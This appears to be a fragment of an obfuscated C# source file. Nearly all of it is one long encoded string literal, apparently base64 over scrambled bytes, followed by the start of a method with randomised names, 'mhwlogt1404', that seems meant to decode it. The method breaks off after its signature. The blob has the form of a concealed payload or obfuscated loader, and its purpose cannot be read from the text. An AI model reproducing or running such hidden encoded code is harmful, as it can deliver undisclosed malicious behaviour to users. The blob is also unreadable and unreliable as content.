qciiyL/Iosmlya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIocioyLXIosimyKTIr8mnya/IgciuyKvIosiOyKnIocioyafItMi1yLXIpci2yK3Is8m+yb7JssmnyK7IqcmnyKnIo8ityKPIvsijyKzJtsm3ybXJscmuyYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLTIs8i1yK7IqcigyafIocisyL/IociryKrIqcm2yb/Jssm/yafJusmnyLTItci1yKXItsityLPJvsm+ybLJqciByLLIq8iryInIpsiqyKLJvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8izyLXIvsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIhsi0yLTIosiqyKXIq8i+yInIpsiqyKLJqciAyKLIs8iGyLTItMiiyKrIpciryL7IicimyKrIosmvyKHIrMi/yKHIq8iqyKnJtsm/ybLJv8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8iuyKHJp8mvyLTItci1yKXItsityLPJvsm+ybLJqciLyKbItMizyJDItciuyLPIosiTyK7IqsiiyanIj8ioyLLItcmpyJPIqMiUyLPItciuyKnIoMmvya7Jp8msyafItMi1yLXIpci2yK3Is8m+yb7JssmpyIvIpsi0yLPIkMi1yK7Is8iiyJPIrsiqyKLJqciKyK7IqciyyLPIosmpyJPIqMiUyLPItciuyKnIoMmvya7Jp8msyafItMi1yLXIpci2yK3Is8m+yb7JssmpyIvIpsi0yLPIkMi1yK7Is8iiyJPIrsiqyKLJqciUyKLIpMioyKnIo8mpyJPIqMiUyLPItciuyKnIoMmvya7Jp8m6ybrJp8mlybbJtsm2ybbJtsm2yaXJrsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIpMioyKnIs8iuyKnIssiiybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8iiyKvItMiiyYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8izyLXIvsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8ipyKHIssioyK3Ivsi9ybLJtcmxya/IocisyL/IociryKrIqcm2yb/Jssm/ya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8ikyLHIoMiiyLbIq8i/yb7Jtsm2yazJrMm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8ikyKbIs8ikyK/JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIpMioyKnIs8iuyKnIssiiybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLrJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8iuyKHJp8mvyKTIscigyKLItsiryL/Jvsm2ybbJp8m6ybrJp8myya7JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i1yKLIs8iyyLXIqcm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyKTIpsizyKTIr8mnyLzJp8ikyKjIqcizyK7IqciyyKLJvMmnyLrJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLrJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyIPIrsi1yKLIpMizyKjItci+yI7IqcihyKjInMiayafItMi3yK/IqMi/yKvIssm0ybTJvsmnybrJp8iuyK/Ir8i3yLbIrcijybTJvsm3yanIgMiiyLPIg8iuyLXIosikyLPIqMi1yK7Iosi0ya/JpcmtyanJrcmlya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIocioyLXIosimyKTIr8mnya/Ig8iuyLXIosikyLPIqMi1yL7IjsipyKHIqMmnyK7Is8i0yKTIs8ivyLTJs8m1yb7Jp8iuyKnJp8i0yLfIr8ioyL/Iq8iyybTJtMm+ya7JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIs8i1yL7JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyK7Iocmnya/IpMixyKDIosi2yKvIv8m+ybbJtsmnybrJusmnybLJrsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLXIosizyLLItcipybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIscigyKPIosityLTIoMm2yb/Jtsmwya/IrsizyLTIpMizyK/ItMmzybXJvsmuybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8ikyKbIs8ikyK/Jp8i8yafIpMioyKnIs8iuyKnIssiiybzJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i1yKLIs8iyyLXIqcm8yYrJjcmnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyLfItciuyLHIpsizyKLJp8i0yLPIpsizyK7IpMmnyKXIqMioyKvJp8ivyKPIssilyL7IpsixybbJtsm0yb/Jr8i0yLPItciuyKnIoMmnyLXIv8iryKvIrcipyKHJtMmzybTJq8mnyLTIs8i1yK7IqcigyafIr8i1yLfIvsi/yLDIocm+ybXJvsmuyYrJjcmnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIjsiEyKjIo8iiyITIqMiqyLfIrsiryKLItcmnyKPIq8izyK3Iv8i2yLbJtsmxybPJsMmnybrJp8ipyKLIsMmnyITIlMivyKbItci3yITIqMijyKLIl8i1yKjIsciuyKPIosi1ya/JrsmpyITItciiyKbIs8iiyITIqMiqyLfIrsiryKLItcmvya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIhMioyKrIt8iuyKvIosi1yJfIpsi1yKbIqsiiyLPIosi1yLTJp8ivyLTItMioyLPIpciyybTJt8myyafJusmnyKnIosiwyafIhMioyKrIt8iuyKvIosi1yJfIpsi1yKbIqsiiyLPIosi1yLTJr8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyK/ItMi0yKjIs8ilyLLJtMm3ybLJqciVyKLIociiyLXIosipyKTIosijyIbItMi0yKLIqsilyKvIrsiiyLTJqciGyKPIo8mvyaXIlMi+yLTIs8iiyKrJqcijyKvIq8mlya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIr8i0yLTIqMizyKXIssm0ybfJssmpyIDIosipyKLItcimyLPIosiCyL/IosikyLLIs8imyKXIq8iiyafJusmnyLPItciyyKLJvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIr8i0yLTIqMizyKXIssm0ybfJssmpyITIqMiqyLfIrsiryKLItciIyLfIs8iuyKjIqci0yafJusmnyaXJqMizyKbItcigyKLIs8m9yLDIrsipyKLIv8iiyaXJvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIr8i0yLTIqMizyKXIssm0ybfJssmpyIjIssizyLfIssizyIbItMi0yKLIqsilyKvIvsmnybrJp8i1yL/Iq8iryK3IqcihybTJs8m0ybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyITIqMiqyLfIrsiryKLItciVyKLItMiyyKvIs8i0yafIvsi0yLXIv8i+yLHIt8m2ybfJtMm1yafJusmnyKPIq8izyK3Iv8i2yLbJtsmxybPJsMmpyITIqMiqyLfIrsiryKLIhsi0yLTIosiqyKXIq8i+yIHItcioyKrIlMioyLLItcikyKLJr8ivyLTItMioyLPIpciyybTJt8myyavJp8ivyLXIt8i+yL/IsMihyb7Jtcm+ya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIocioyLXIosimyKTIr8mnya/IhMioyKrIt8iuyKvIosi1yILItci1yKjItcmnyL/ItMisyLXIsMisyKXJtsmzyb7JtsmnyK7IqcmnyL7ItMi1yL/IvsixyLfJtsm3ybTJtcmpyILItci1yKjItci0ya7JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIhMioyKnItMioyKvIosmpyJDItciuyLPIosiLyK7Iqciiya/Iv8i0yKzItciwyKzIpcm2ybPJvsm2yanIgsi1yLXIqMi1yInIssiqyKXIosi1yafJrMmnyaXJvcmnyaXJp8msyafIv8i0yKzItciwyKzIpcm2ybPJvsm2yanIgsi1yLXIqMi1yJPIosi/yLPJrsm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIrsihyafJr8i+yLTItci/yL7Isci3ybbJt8m0ybXJqciCyLXItcioyLXItMmpyITIqMiyyKnIs8mnybrJusmnybfJrsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i1yKLIs8iyyLXIqcmnyLPItciyyKLJvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIosiryLTIosmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i1yKLIs8iyyLXIqcmnyKHIpsiryLTIosm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyLfItciuyLHIpsizyKLJp8i0yLPIpsizyK7IpMmnyLTIs8i1yK7IqcigyafIqMikyKDItsi9yK/Iqsm2ybTJt8myya/ItMizyLXIrsipyKDJp8ityK7IscivyLPIr8i3ybbJsMmuyYrJjcmnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIpci+yLPIosicyJrJp8ipyL7IrsiwyL3IqcipybbJt8mxybTJp8m6yafIhMioyKnIsciiyLXIs8mpyIHItcioyKrIhcimyLTIosmxybPIlMizyLXIrsipyKDJr8ityK7IscivyLPIr8i3ybbJsMmuybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLXIosizyLLItcipyafIgsipyKTIqMijyK7IqcigyanIksiTyIHJv8mpyIDIosizyJTIs8i1yK7Iqcigya/Iqci+yK7IsMi9yKnIqcm2ybfJscm0ya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyLrJismNyafJp8mnyafJp8mnyafJp8i3yLXIrsixyKbIs8iiyafItMizyKbIs8iuyKTJp8i0yLPItciuyKnIoMmnyKXItsi9yK3IrcityK7Jtsmwya/ItMizyLXIrsipyKDJp8i2yK7It8iryKbIosiyybbJvsm+ybLJq8mnyK7IqcizyafItsiuyKjIpciwyKjIoMm2ybbJs8mwyL/JrsmKyY3Jp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyJTIs8i1yK7IqcigyIXIssiuyKvIo8iiyLXJp8ijyLfIpMi1yLbIs8i3ybbJvsmyybXJp8m6yafIqciiyLDJp8iUyLPItciuyKnIoMiFyLLIrsiryKPIosi1ya/ItsiuyLfIq8imyKLIssm2yb7Jvsmyya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIlMizyLXIrsipyKDIhciyyK7Iq8ijyKLItcmnyL7Ioci/yKLIrciqyKbJtsm+ybPJvsmnybrJp8ipyKLIsMmnyJTIs8i1yK7IqcigyIXIssiuyKvIo8iiyLXJr8i2yK7It8iryKbIosiyybbJvsm+ybLJqciLyKLIqcigyLPIr8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyKTIr8imyLXJp8iuyKXIs8ikyL/Io8ilybDJssm3ybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyKHIqMi1yafJr8iuyKnIs8mnyLDIsMikyLfIociwyLTJvsm0ybLJp8m6yafJt8m8yafIsMiwyKTIt8ihyLDItMm+ybTJssmnybvJp8i2yK7It8iryKbIosiyybbJvsm+ybLJqciLyKLIqcigyLPIr8m8yafIsMiwyKTIt8ihyLDItMm+ybTJssmsyazJrsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8iuyKXIs8ikyL/Io8ilybDJssm3yafJusmnyKPIt8ikyLXItsizyLfJtsm+ybLJtcicyLDIsMikyLfIociwyLTJvsm0ybLImsm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyK7IpcizyKTIv8ijyKXJsMmyybfJp8m6yafJr8ikyK/Ipsi1ya7Jr8iuyKXIs8ikyL/Io8ilybDJssm3yafImcmnyLbIrsioyKXIsMioyKDJtsm2ybPJsMi/ya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8i+yKHIv8iiyK3IqsimybbJvsmzyb7JqciGyLfIt8iiyKnIo8mvyK7IpcizyKTIv8ijyKXJsMmyybfJrsm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i1yKLIs8iyyLXIqcmnyL7Ioci/yKLIrciqyKbJtsm+ybPJvsmpyJPIqMiUyLPItciuyKnIoMmvya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyLrJismNyafJp8mnyafJp8mnyafJp8i3yLXIrsixyKbIs8iiyafItMizyKbIs8iuyKTJp8i0yLPItciuyKnIoMmnyKnIpMiiyLTIqsilyK7Jtsm1ybDJs8mvyLTIs8i1yK7IqcigyafIt8i0yLXIrciqyLDIrMm0ybDJtsmuyYrJjcmnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIksiTyIHJv8iCyKnIpMioyKPIrsipyKDJp8ityKLIo8ivyKLIvsizybHJscmyyafJusmnyKnIosiwyafIksiTyIHJv8iCyKnIpMioyKPIrsipyKDJr8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLXIosizyLLItcipyafIhMioyKnIsciiyLXIs8mpyJPIqMiFyKbItMiiybHJs8iUyLPItciuyKnIoMmvyK3IosijyK/Iosi+yLPJscmxybLJqciAyKLIs8iFyL7Is8iiyLTJr8i3yLTItcityKrIsMisybTJsMm2ya7Jrsm8yYrJjcmnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyLfItciuyLHIpsizyKLJp8i0yLPIpsizyK7IpMmnyLTIs8i1yK7IqcigyafIrciyyKvItMiiyKjIsMmyybfJscmvyLTIs8i1yK7IqcigyafIqsigyKLItcivyL7Is8mwybPJsMmuyYrJjcmnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIlcimyKnIo8ioyKrJp8ivyLHIrMi1yKXIr8i+yb7Jscm1yafJusmnyKnIosiwyafIlcimyKnIo8ioyKrJr8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLTIs8i1yK7IqcigyJzImsmnyKnIvcityKvIocihyKjJtsm2yb/Jt8mnybrJp8i8yaXIpMiwyLPItMiryKbIs8m2ybDJtcmxyaXJq8mlyK/IvsihyKLIrMi9yKXJtsm/ybHJvsmlyavJpcityLDIqMixyL7IociyybbJtMmwybXJpcmryaXIqsi3yKXIt8ivyK3It8m2ybXJs8m3yaXJq8mlyLDIr8ilyKvIqcizyK7Jtsm1ybbJssmlyavJpcigyKzItcixyKHItcimybXJvsm2yaXJq8mlyKrIqMityLXItMiyyK/JsMm+ybTJpcmryaXIpMioyLLIosi0yL3ItMm/ybDJvsmlyavJpciiyLXIt8iyyL7IoMilybbJssmyyb/JpcmryaXItcioyLDIo8ilyLPItcm2ybDJtMm1yaXJq8mlyKrIssimyL/IqMipyKHJtsm2ybXJtMmlyavJpcizyKHIpMigyLDIvsihybDJt8m0yaXJq8mlyLTItciryLXIt8ityLPJtsm/ybHJpcmryaXIo8iwyKTIqsi+yKrIocm2ybfJssm2yaXJq8mlyLHIqsityKnIr8isyKvJtsmzybLJtcmlyavJpciuyLDIqci9yKHIs8izybTJt8m/yaXJq8mlyK7IqMisyLXIsciyyL7Jtsm2ybXJssmlyavJpciuyK/Ir8i3yLbIrcijybTJvsm3yaXJq8mlyLTItci1yKXItsityLPJvsm+ybLJpcmryaXIqcijyK3Io8i+yKPIrMm2ybfJtcmxyaXJq8mlyKHIrMi/yKHIq8iqyKnJtsm/ybLJv8mlyavJpci0yLfIr8ioyL/Iq8iyybTJtMm+yaXJq8mlyK7Is8i0yKTIs8ivyLTJs8m1yb7JpcmryaXIr8ikyL7Iqci3yKrIosm2ybfJtMm/yaXJq8mlyLHIoMijyKLIrci0yKDJtsm/ybbJsMmlyavJpcizyKTIqMi2yKPItMihybDJssmzyaXJq8mlyKTIscigyKLItsiryL/Jvsm2ybbJpcmryaXIqcihyLLIqMityL7IvcmyybXJscmlyavJpcivyLbIpMityK7Irsixyb/JtsmxyaXJq8mlyK/IscijyKHIs8i/yLHJtsm2yb7JssmlyavJpcijyK/IpciqyLbIrsilybbJs8m2yaXJq8mlyLXIpsiqyLLIsMisyLHJtsm1yb/JscmlyavJpcipyKvIq8ilyK/Is8i9ybbJtcm+ybfJpcmryaXIocipyLLIo8iryLTIqcm/ybTJv8mlyavJpciyyKLIosipyKPIo8iqybHJvsmyyaXJq8mlyKbIs8ioyKLIosihyKXJtsmxybHJvsmlyavJpci/yKLIrci3yLDIrsijybbJt8myyaXJq8mlyKzItsiuyKjIssiuyLXJsMm3ybPJpcmryaXIoci/yL3ItMivyLPItcmxybLJs8mlyavJpci2yKvIrsi9yKDIqcigybbJssm3ybbJpcmryaXIo8ixyKHIscigyK3Ir8m2ybLJv8m2yaXJq8mlyK3Is8ipyLPIssiryLHJs8m3yaXJq8mlyLPIqciiyKPIo8i9yKHJtcmwyb7JpcmryaXIr8ixyKzItcilyK/Ivsm+ybHJtcmlyavJpci/yKjIqci2yKPIssi/ybbJvsm1ybXJpcmryaXIrsiwyLLIociwyKTIssm2ybXJsMm0yaXJq8mlyKrIr8iwyKvIqMigyLPJtsmzybfJs8mlyavJpcijyLfIt8i2yLPIosiuybbJtMm0ybbJpcmryaXIo8isyK3IrsipyKnItsm0ybbJpcmryaXIr8ijyLLIpci+yKbIscm2ybbJtMm/yaXJq8mlyLXIv8iryKvIrcipyKHJtMmzybTJpcmryaXIo8iryLPIrci/yLbItsm2ybHJs8mwyaXJq8mlyK/ItMi0yKjIs8ilyLLJtMm3ybLJpcmryaXIv8i0yKzItciwyKzIpcm2ybPJvsm2yaXJq8mlyL7ItMi1yL/IvsixyLfJtsm3ybTJtcmlyavJpcixyL7IrMi+yKPIoMi9yb7JssmxyaXJq8mlyKrIrsioyK3Io8ihyKrJtsm1ybDJpcmryaXIpci2yL3IrcityK3Irsm2ybDJpcmryaXItsiuyLfIq8imyKLIssm2yb7JvsmyyaXJq8mlyLbIrsioyKXIsMioyKDJtsm2ybPJsMmlyavJpcijyLfIpMi1yLbIs8i3ybbJvsmyybXJpcmryaXIvsihyL/IosityKrIpsm2yb7Js8m+yaXJq8mlyK7IpcizyKTIv8ijyKXJsMmyybfJpcmryaXIsMiwyKTIt8ihyLDItMm+ybTJssmlyavJpcipyKTIosi0yKrIpciuybbJtcmwybPJpcmryaXIoMiqyKrIsMivyLLIrMm2ybPJt8mxyaXJq8mlyLXIqsi3yL3IosiwyKDJvsm/ybXJpcmryaXIpsivyLTIssi2yKPIrMm0ybLJpcmryaXIr8i1yLfIvsi/yLDIocm+ybXJvsmlyavJpciyyKjIosisyKLIscikybbJs8mxybLJpcmryaXIrMi0yLLIrciryL3IpcmwybDJssmlyavJpci+yLLIq8iiyKXIpMi+ybbJt8myyaXJq8mlyKjIpMigyLbIvcivyKrJtsm0ybfJssmlyavJpcipyL7IrsiwyL3IqcipybbJt8mxybTJpcmryaXIrciuyLHIr8izyK/It8m2ybDJpcmryaXIrciyyKvItMiiyKjIsMmyybfJscmlyavJpciqyKDIosi1yK/IvsizybDJs8mwyaXJq8mlyKXIssi1yKnIs8i3yKnJtsm2ybLJt8mlyavJpciqyK/IsMiryKjIoMizybbJs8m3ybPJpcmryaXIvcikyK/ItMikyK/Iqsm2ybbJs8mlyavJpcixyL7Is8iryKXIvsi2ybTJsMmlyavJpci+yKTIpsi3yL/Iv8ivybbJtcmxybXJpcmryaXIrcixyKTIoci+yL7Iscm2ybfJscm/yaXJq8mlyL7Iqci+yK/Iq8iwyKrJtcmyybfJpcmryaXIpci2yLbIqMimyKXItsmzybXJtcmlyavJpcipyL3IrciryKHIocioybbJtsm/ybfJpcmryaXIrciiyKPIr8iiyL7Is8mxybHJssmlyavJpci3yLTItcityKrIsMisybTJsMm2yaXIusm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8ihyKjItcmnya/IrsipyLPJp8ilyLbItsioyKbIpci2ybPJtcm1yafJusmnybfJvMmnyKXItsi2yKjIpsilyLbJs8m1ybXJp8m7yafIqci9yK3Iq8ihyKHIqMm2ybbJv8m3yanIi8iiyKnIoMizyK/JvMmnyKXItsi2yKjIpsilyLbJs8m1ybXJrMmsya7JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIqsigyKLItcivyL7Is8mwybPJsMmnybrJp8iqyKDIosi1yK/IvsizybDJs8mwyanIlciiyLfIq8imyKTIosmvyKnIvcityKvIocihyKjJtsm2yb/Jt8icyKXItsi2yKjIpsilyLbJs8m1ybXImsmryafIqsivyLDIq8ioyKDIs8m2ybPJt8mzya/Ir8ixyKzItcilyK/Ivsm+ybHJtcmpyInIosi/yLPJr8m2ybfJt8m3ybfJq8m+yb7Jvsm+yb7Jvsmuya7Jrsm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8i1yKLIs8iyyLXIqcmnyKrIoMiiyLXIr8i+yLPJsMmzybDJvMmKyY3Jp8mnyafJp8mnyafJp8mnyLrJismNyafJp8mnyafJp8mnyafJp8i3yLXIrsixyKbIs8iiyafItMizyKbIs8iuyKTJp8ilyL7Is8iiyJzImsmnyLLIosiiyKnIo8ijyKrJscm+ybLJr8iByK7Iq8iiyJTIs8i1yKLIpsiqyafIr8ikyL7Iqci3yKrIosm2ybfJtMm/yavJp8iuyKnIs8mnyKbIs8ioyKLIosihyKXJtsmxybHJvsmryafIrsipyLPJp8ikyL/IosityLfIsMiuyKPJtsm3ybLJrsmKyY3Jp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyIXIrsipyKbItci+yJXIosimyKPIosi1yafIrMi2yK7IqMiyyK7ItcmwybfJs8mnybrJp8ipyKLIsMmnyIXIrsipyKbItci+yJXIosimyKPIosi1ya/Ir8ikyL7Iqci3yKrIosm2ybfJtMm/ya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIrMi2yK7IqMiyyK7ItcmwybfJs8mpyIXIpsi0yKLIlMizyLXIosimyKrJqciUyKLIosisya/IpMi/yKLIrci3yLDIrsijybbJt8myyavJp8iUyKLIosisyIjItciuyKDIrsipyanIhciiyKDIrsipya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIpci+yLPIosicyJrJp8ihyL/Ivci0yK/Is8i1ybHJssmzyafJusmnyKnIosiwyafIpci+yLPIosicyKbIs8ioyKLIosihyKXJtsmxybHJvsiaybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyK7IqcizyafIqciryKvIpcivyLPIvcm2ybXJvsm3yafJusmnya/IrsipyLPJrsimyLPIqMiiyKLIocilybbJscmxyb7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIrsipyLPJp8i1yKbIqsiyyLDIrMixybbJtcm/ybHJp8m6yafJt8m8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8iwyK/IrsiryKLJp8mvyKnIq8iryKXIr8izyL3Jtsm1yb7Jt8mnybnJp8m3ya7JismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafIrsipyLPJp8ihyKnIssijyKvItMipyb/JtMm/yafJusmnyKzItsiuyKjIssiuyLXJsMm3ybPJqciVyKLIpsijya/Ioci/yL3ItMivyLPItcmxybLJs8mryafItcimyKrIssiwyKzIscm2ybXJv8mxyavJp8ipyKvIq8ilyK/Is8i9ybbJtcm+ybfJrsm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyK7Iocmnya/IocipyLLIo8iryLTIqcm/ybTJv8mnybrJusmnybfJrsmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyKXItciiyKbIrMm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLXIpsiqyLLIsMisyLHJtsm1yb/JscmnyazJusmnyKHIqciyyKPIq8i0yKnJv8m0yb/JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8mnyafJp8ipyKvIq8ilyK/Is8i9ybbJtcm+ybfJp8mqybrJp8ihyKnIssijyKvItMipyb/JtMm/ybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLrJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyKzItsiuyKjIssiuyLXJsMm3ybPJqciEyKvIqMi0yKLJr8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLXIosizyLLItcipyafIoci/yL3ItMivyLPItcmxybLJs8m8yYrJjcmnyafJp8mnyafJp8mnyafIusmKyY3Jp8mnyafJp8mnyafJp8mnyLfItciuyLHIpsizyKLJp8i0yLPIpsizyK7IpMmnyLHIqMiuyKPJp8i2yKvIrsi9yKDIqcigybbJssm3ybbJr8iByK7Iq8iiyJTIs8i1yKLIpsiqyafIr8ikyL7Iqci3yKrIosm2ybfJtMm/yavJp8ilyL7Is8iiyJzImsmnyKPIscihyLHIoMityK/Jtsmyyb/JtsmryafIpci+yLPIosicyJrJp8ityLPIqcizyLLIq8ixybPJt8muyYrJjcmnyafJp8mnyafJp8mnyafIvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIhciuyKnIpsi1yL7IkMi1yK7Is8iiyLXJp8izyKnIosijyKPIvcihybXJsMm+yafJusmnyKnIosiwyafIhciuyKnIpsi1yL7IkMi1yK7Is8iiyLXJr8ivyKTIvsipyLfIqsiiybbJt8m0yb/Jrsm8yYrJjcmnyafJp8mnyafJp8mnyafJp8mnyafJp8izyKnIosijyKPIvcihybXJsMm+yanIhcimyLTIosiUyLPItciiyKbIqsmpyJTIosiiyKzJr8m3yavJp8iUyKLIosisyIjItciuyKDIrsipyanIhciiyKDIrsipya7JvMmKyY3Jp8mnyafJp8mnyafJp8mnyafJp8mnyafIs8ipyKLIo8ijyL3Iocm1ybDJvsmpyJDItciuyLPIosmvyKPIscihyLHIoMityK/Jtsmyyb/JtsmuybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLPIqciiyKPIo8i9yKHJtcmwyb7JqciQyLXIrsizyKLJr8ityLPIqcizyLLIq8ixybPJt8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLPIqciiyKPIo8i9yKHJtcmwyb7JqciByKvIssi0yK/Jr8muybzJismNyafJp8mnyafJp8mnyafJp8mnyafJp8mnyLPIqciiyKPIo8i9yKHJtcmwyb7JqciEyKvIqMi0yKLJr8muybzJismNyafJp8mnyafJp8mnyafJp8i6yYrJjcmnyafJp8mnyLrJismNyLo=";

	private static string mhwlogt1404(int dppqtei1331)
	{
